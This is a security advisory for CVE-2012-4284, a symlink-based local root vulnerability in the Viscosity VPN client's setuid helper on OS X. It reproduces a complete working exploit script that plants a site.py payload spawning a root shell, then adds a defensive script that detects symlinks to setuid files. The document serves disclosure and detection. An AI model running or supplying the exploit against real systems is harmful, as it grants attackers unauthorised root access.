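OS X Viscosity OpenVPN Client Local Privilege Escalation Vulnerability
Published: 2012-08-12
Updated: 2012-08-12
Affected systems: Viscosity Viscosity
Description:
CVE(CAN) ID: CVE-2012-4284
Viscosity is an OpenVPN client for the Mac and Windows platforms.
Viscosity contains a privilege escalation vulnerability: the setuid ViscosityHelper binary executes arbitrary scripts insecurely. A local attacker can exploit this through a symlink attack to gain elevated privileges.
<*Source: Jason A. Donenfeld
Link: http://osvdb.org/show/osvdb/84709
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!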
#!/bin/sh
#
##########################
# Viscatory #
# #
# zx2c4 #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savvy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl("/bin/bash", "bash")
_EOF
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/root
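Recommendation:
Vendor patch:
Viscosity
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: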
http://www.thesparklabs.com/viscosity/
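The test script above stages a symlink to the setuid helper in a writable directory with a site.py beside it. While no vendor patch is available, the following added example (not part of the original advisory or any vendor tooling) reports symlinks that resolve to a setuid file and whether a site.py sits next to them; the function names and the constructed fixture are assumptions.

```sh
#!/bin/sh
# Added example, not from the advisory: report symlinks that resolve to a
# setuid file and whether a site.py sits beside the link.

# Output, one line per finding: <link> -> <target> [site.py present|no site.py]
scan_setuid_symlinks() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type l 2>/dev/null | while IFS= read -r link; do
            # test -f and -u follow the symlink, so they inspect the target.
            [ -f "$link" ] && [ -u "$link" ] || continue
            target=$(readlink "$link")
            if [ -e "$(dirname "$link")/site.py" ]; then
                note="site.py present"
            else
                note="no site.py"
            fi
            printf '%s -> %s [%s]\n' "$link" "$target" "$note"
        done
    done
}

# Constructed fixture (assumption, for demonstration): a stand-in setuid file
# owned by the current user, a symlink to it with site.py beside it, and an
# ordinary symlink that must not be reported. Prints the fixture path.
make_fixture() {
    d=$(mktemp -d) || return 1
    mkdir "$d/app" "$d/staged" "$d/benign"
    printf '#!/bin/sh\n' > "$d/app/Helper"
    chmod 4755 "$d/app/Helper"
    ln -s "$d/app/Helper" "$d/staged/root"
    : > "$d/staged/site.py"
    : > "$d/benign/file"
    ln -s "$d/benign/file" "$d/benign/link"
    printf '%s\n' "$d"
}

# Scan the directories named on the command line, or the fixture if none.
if [ "$#" -gt 0 ]; then
    scan_setuid_symlinks "$@"
else
    fx=$(make_fixture) && scan_setuid_symlinks "$fx"
    rm -rf "$fx"
fi
```

On a real host, pass user-writable locations such as /tmp as arguments; any reported link deserves a look, and one with a site.py beside it matches the layout used in the test script.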